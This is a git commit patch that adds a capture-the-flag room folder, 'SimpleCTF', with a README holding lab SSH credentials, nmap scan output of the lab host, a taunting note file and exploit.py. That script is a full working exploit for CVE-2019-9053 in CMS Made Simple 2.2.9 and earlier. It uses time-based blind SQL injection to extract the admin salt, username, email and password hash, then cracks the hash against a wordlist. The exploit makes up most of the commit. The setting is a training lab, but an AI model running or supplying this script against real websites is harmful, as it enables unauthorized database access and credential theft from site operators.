From 71dd1dc672fb230428ed3662f59b552eac70d215 Mon Sep 17 00:00:00 2001
From: Raghuram Subramani <raghus2247@gmail.com>
Date: Tue, 1 Mar 2022 14:47:08 +0530
Subject: add rooms

---
 SimpleCTF/ForMitch.txt |   1 +
 SimpleCTF/README.md    |   7 ++
 SimpleCTF/exploit.py   | 186 +++++++++++++++++++++++++++++++++++++++++++++++++
 SimpleCTF/nmap/initial |  35 ++++++++++
 4 files changed, 229 insertions(+)
 create mode 100644 SimpleCTF/ForMitch.txt
 create mode 100644 SimpleCTF/README.md
 create mode 100644 SimpleCTF/exploit.py
 create mode 100644 SimpleCTF/nmap/initial

(limited to 'SimpleCTF')

diff --git a/SimpleCTF/ForMitch.txt b/SimpleCTF/ForMitch.txt
new file mode 100644
index 0000000..596c727
--- /dev/null
+++ b/SimpleCTF/ForMitch.txt
@@ -0,0 +1 @@
+Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess!
diff --git a/SimpleCTF/README.md b/SimpleCTF/README.md
new file mode 100644
index 0000000..b0465a6
--- /dev/null
+++ b/SimpleCTF/README.md
@@ -0,0 +1,7 @@
+IP address >`10.10.73.108`
+
+SSH > 
+```
+mitch
+secret
+```
\ No newline at end of file
diff --git a/SimpleCTF/exploit.py b/SimpleCTF/exploit.py
new file mode 100644
index 0000000..260e4e7
--- /dev/null
+++ b/SimpleCTF/exploit.py
@@ -0,0 +1,186 @@
+#!/usr/bin/env python3
+# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9
+# Date: 30-03-2019
+# Exploit Author: Daniele Scanu @ Certimeter Group
+# Vendor Homepage: https://www.cmsmadesimple.org/
+# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
+# Version: <= 2.2.9
+# Tested on: Ubuntu 18.04 LTS
+# CVE : CVE-2019-9053
+
+import requests
+from termcolor import colored
+import time
+from termcolor import cprint
+import optparse
+import hashlib
+
+parser = optparse.OptionParser()
+parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://10.10.10.100/cms)")
+parser.add_option('-w', '--wordlist', action="store", dest="wordlist", help="Wordlist for crack admin password")
+parser.add_option('-c', '--crack', action="store_true", dest="cracking", help="Crack password with wordlist", default=False)
+
+options, args = parser.parse_args()
+if not options.url:
+    print "[+] Specify an url target"
+    print "[+] Example usage (no cracking password): exploit.py -u http://target-uri"
+    print "[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist"
+    print "[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based."
+    exit()
+
+url_vuln = options.url + '/moduleinterface.php?mact=News,m1_,default,0'
+session = requests.Session()
+dictionary = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$'
+flag = True
+password = ""
+temp_password = ""
+TIME = 1
+db_name = ""
+output = ""
+email = ""
+
+salt = ''
+wordlist = ""
+if options.wordlist:
+    wordlist += options.wordlist
+
+def crack_password():
+    global password
+    global output
+    global wordlist
+    global salt
+    dict = open(wordlist)
+    for line in dict.readlines():
+        line = line.replace("\n", "")
+        beautify_print_try(line)
+        if hashlib.md5(str(salt) + line).hexdigest() == password:
+            output += "\n[+] Password cracked: " + line
+            break
+    dict.close()
+
+def beautify_print_try(value):
+    global output
+    print "\033c"
+    cprint(output,'green', attrs=['bold'])
+    cprint('[*] Try: ' + value, 'red', attrs=['bold'])
+
+def beautify_print():
+    global output
+    print "\033c"
+    cprint(output,'green', attrs=['bold'])
+
+def dump_salt():
+    global flag
+    global salt
+    global output
+    ord_salt = ""
+    ord_salt_temp = ""
+    while flag:
+        flag = False
+        for i in range(0, len(dictionary)):
+            temp_salt = salt + dictionary[i]
+            ord_salt_temp = ord_salt + hex(ord(dictionary[i]))[2:]
+            beautify_print_try(temp_salt)
+            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_siteprefs+where+sitepref_value+like+0x" + ord_salt_temp + "25+and+sitepref_name+like+0x736974656d61736b)+--+"
+            url = url_vuln + "&m1_idlist=" + payload
+            start_time = time.time()
+            r = session.get(url)
+            elapsed_time = time.time() - start_time
+            if elapsed_time >= TIME:
+                flag = True
+                break
+        if flag:
+            salt = temp_salt
+            ord_salt = ord_salt_temp
+    flag = True
+    output += '\n[+] Salt for password found: ' + salt
+
+def dump_password():
+    global flag
+    global password
+    global output
+    ord_password = ""
+    ord_password_temp = ""
+    while flag:
+        flag = False
+        for i in range(0, len(dictionary)):
+            temp_password = password + dictionary[i]
+            ord_password_temp = ord_password + hex(ord(dictionary[i]))[2:]
+            beautify_print_try(temp_password)
+            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users"
+            payload += "+where+password+like+0x" + ord_password_temp + "25+and+user_id+like+0x31)+--+"
+            url = url_vuln + "&m1_idlist=" + payload
+            start_time = time.time()
+            r = session.get(url)
+            elapsed_time = time.time() - start_time
+            if elapsed_time >= TIME:
+                flag = True
+                break
+        if flag:
+            password = temp_password
+            ord_password = ord_password_temp
+    flag = True
+    output += '\n[+] Password found: ' + password
+
+def dump_username():
+    global flag
+    global db_name
+    global output
+    ord_db_name = ""
+    ord_db_name_temp = ""
+    while flag:
+        flag = False
+        for i in range(0, len(dictionary)):
+            temp_db_name = db_name + dictionary[i]
+            ord_db_name_temp = ord_db_name + hex(ord(dictionary[i]))[2:]
+            beautify_print_try(temp_db_name)
+            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+username+like+0x" + ord_db_name_temp + "25+and+user_id+like+0x31)+--+"
+            url = url_vuln + "&m1_idlist=" + payload
+            start_time = time.time()
+            r = session.get(url)
+            elapsed_time = time.time() - start_time
+            if elapsed_time >= TIME:
+                flag = True
+                break
+        if flag:
+            db_name = temp_db_name
+            ord_db_name = ord_db_name_temp
+    output += '\n[+] Username found: ' + db_name
+    flag = True
+
+def dump_email():
+    global flag
+    global email
+    global output
+    ord_email = ""
+    ord_email_temp = ""
+    while flag:
+        flag = False
+        for i in range(0, len(dictionary)):
+            temp_email = email + dictionary[i]
+            ord_email_temp = ord_email + hex(ord(dictionary[i]))[2:]
+            beautify_print_try(temp_email)
+            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+email+like+0x" + ord_email_temp + "25+and+user_id+like+0x31)+--+"
+            url = url_vuln + "&m1_idlist=" + payload
+            start_time = time.time()
+            r = session.get(url)
+            elapsed_time = time.time() - start_time
+            if elapsed_time >= TIME:
+                flag = True
+                break
+        if flag:
+            email = temp_email
+            ord_email = ord_email_temp
+    output += '\n[+] Email found: ' + email
+    flag = True
+
+dump_salt()
+dump_username()
+dump_email()
+dump_password()
+
+if options.cracking:
+    print colored("[*] Now try to crack password")
+    crack_password()
+
+beautify_print()
\ No newline at end of file
diff --git a/SimpleCTF/nmap/initial b/SimpleCTF/nmap/initial
new file mode 100644
index 0000000..3ae0e7d
--- /dev/null
+++ b/SimpleCTF/nmap/initial
@@ -0,0 +1,35 @@
+# Nmap 7.80 scan initiated Mon Feb 28 21:34:09 2022 as: nmap -sC -sV -oN nmap/initial 10.10.73.108
+Nmap scan report for 10.10.73.108
+Host is up (0.19s latency).
+Not shown: 997 filtered ports
+PORT     STATE SERVICE VERSION
+21/tcp   open  ftp     vsftpd 3.0.3
+| ftp-anon: Anonymous FTP login allowed (FTP code 230)
+|_Can't get directory listing: TIMEOUT
+| ftp-syst: 
+|   STAT: 
+| FTP server status:
+|      Connected to ::ffff:10.17.36.210
+|      Logged in as ftp
+|      TYPE: ASCII
+|      No session bandwidth limit
+|      Session timeout in seconds is 300
+|      Control connection is plain text
+|      Data connections will be plain text
+|      At session startup, client count was 3
+|      vsFTPd 3.0.3 - secure, fast, stable
+|_End of status
+80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
+| http-robots.txt: 2 disallowed entries 
+|_/ /openemr-5_0_1_3 
+|_http-server-header: Apache/2.4.18 (Ubuntu)
+|_http-title: Apache2 Ubuntu Default Page: It works
+2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey: 
+|   2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
+|   256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA)
+|_  256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (ED25519)
+Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
+
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Mon Feb 28 21:35:07 2022 -- 1 IP address (1 host up) scanned in 57.41 seconds
-- 
cgit v1.2.3